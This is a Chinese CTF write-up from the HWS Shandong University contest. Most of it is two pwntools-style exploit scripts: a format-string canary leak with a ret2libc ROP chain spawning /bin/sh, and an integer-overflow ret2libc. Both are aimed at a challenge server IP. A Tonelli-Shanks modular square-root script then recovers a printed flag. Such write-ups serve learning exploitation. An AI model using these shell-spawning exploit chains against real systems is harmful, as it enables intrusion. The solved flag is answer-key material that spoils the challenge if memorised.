HWS山大专区PWN双一血 & CRYPTO-WP

2023.11.18
两天半的比赛，就打了半天（因为要赶去打香山杯决赛了），不过结果还算好，人生第一次拿了两个一血hhh。写wp的时候人在中大南校北门的酒店里:)

controller

格式化字符串泄露canary之后打ret2libc即可。

from evilblade import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')
libset('./libc-2.27.so')
evgdb()
rsetup('124.71.135.126',30024)

rdi = 0x0000000000402533 # pop rdi ; ret
putsg = gotadd('puts')
puts = pltadd('puts')

sl(b'6')
sl(b'2')
sl(b'2')
sla('fo',b'%13$p')

sl(b'')
sl(b'1')
sl(b'')

ru(b'No.2')
addx = getx(-13,-1)
base = addx - 0x21c87
dpx('libcbase',base)

sl(b'6')
sl(b'2')

addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()
addx=tet()

can = getx(-19,-1)
dpx('can',can)

#需要泄露canary
sl(b'0')
sl(b'0')
sl(b'')

sl(b'9')
sla('ame:',b's'*1)
sh = base+0x00000000001b3d88
sys = pltadd('system')
ret = 0x0000000000400b3e
#sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+p64(0x400d20))
sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+b'aaaaaaaa'+p64(rdi)+p64(sh)+p64(ret)*3+p64(sys))

ia()

inverse

ret2libc和整数溢出

from evilblade import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')
libset('./libc-2.27.so')
evgdb()
rsetup('124.71.135.126',30007)

tag = 0x804C030
puts = pltadd('puts')
putsg = gotadd('puts')
sa(':',b'/bin/sh')
sl(b'-1')
sla(':',b'a'*(0x3c+4)+p32(puts)+p32(0x80493d5)+p32(putsg))
add = getx64(0,-17)
base = getbase(add,'puts')
pause()
sl(b'-1')
sys = symoff('system',base)
sh = base + 0x0017b9db
sl(b'a'*(0x3c+4)+p32(sys)+p32(0xdeadbeef)+p32(sh)+p32(0xdeadbeaf))
ia()

ezrsa

求模平方根即可。

n = 4124820799737107236308837008524397355107786950414769996181324333556950154206980059406402767327725312238673053581148641438494212320157665395208337575556385
m = 13107939563507459774616204141253747489232063336204173944123263284507604328885680072478669016969428366667381358004059204207134817952620014738665450753147857
def legendre_symbol(a, p):
    # 计算雅可比符号 (a/p)
    if a % p == 0:
        return 0
    elif pow(a, (p - 1) // 2, p) == 1:
        return 1
    else:
        return -1

def mod_sqrt(n, p):
    # Tonelli-Shanks 算法求模平方根
    if legendre_symbol(n, p) != 1:
        raise Exception('No modular square root exists')

    q = p - 1
    s = 0
    while q % 2 == 0:
        q //= 2
        s += 1

    if s == 1:
        return pow(n, (p + 1) // 4, p)

    z = 2
    while legendre_symbol(z, p) != -1:
        z += 1

    c = pow(z, q, p)
    r = pow(n, (q + 1) // 2, p)
    t = pow(n, q, p)
    m = s

    while t != 1:
        i = 1
        while pow(t, 2**i, p) != 1:
            i += 1

        b = pow(c, 2**(m - i - 1), p)
        r = (r * b) % p
        t = (t * b * b) % p
        c = (b * b) % p
        m = i

    return r

def solve_quadratic_congruence(n, m):
    # 解二次同余方程 x^2 ≡ n (mod m)
    if m == 2:
        return [n % 2, (n % 2) ^ 1]  # 对于模2，只有0和1两个解

    solutions = []

    # 判断模平方根是否存在
    if pow(n, (m - 1) // 2, m) != 1:
        raise Exception('No solution exists')

    # 计算模平方根
    sqrt_n = mod_sqrt(n, m)

    # 解方程
    x1 = sqrt_n
    x2 = m - sqrt_n

    solutions.append(x1)
    solutions.append(x2)

    return solutions

# 示例用法
result = solve_quadratic_congruence(n, m)
print(f"Solutions for x^2 ≡ {n} (mod {m}): {result}")
'''
>>> from Crypto.Util.number import *
>>> long_to_bytes(13107939563507459774616204141253747489232063336204173944123263271467599846065153978657975398261302535968199127597145828004727119047657179535038810099310932)
b'\xfaFF"\x0bxn\x93\xd1\xfd8\x91\x8d;g\x8c\xf7Wj\xcf\x8c\xde\x94\x14\xea\xd9\xfdB\xd5\x16\xe4>\xe5\xdf%(\xb29^\x87v\x04\x9eOV\xc9\xd18\xc6o\x08\xb8vL\x16N\xb6\xede\xf9\x13\x90aT'
>>> long_to_bytes(13040004482820526093820693618708125830699182230406913376202407698904962835203626640653836925)
b'flag{9971e255f0c020e8e57fbae75f43d7fb}'
'''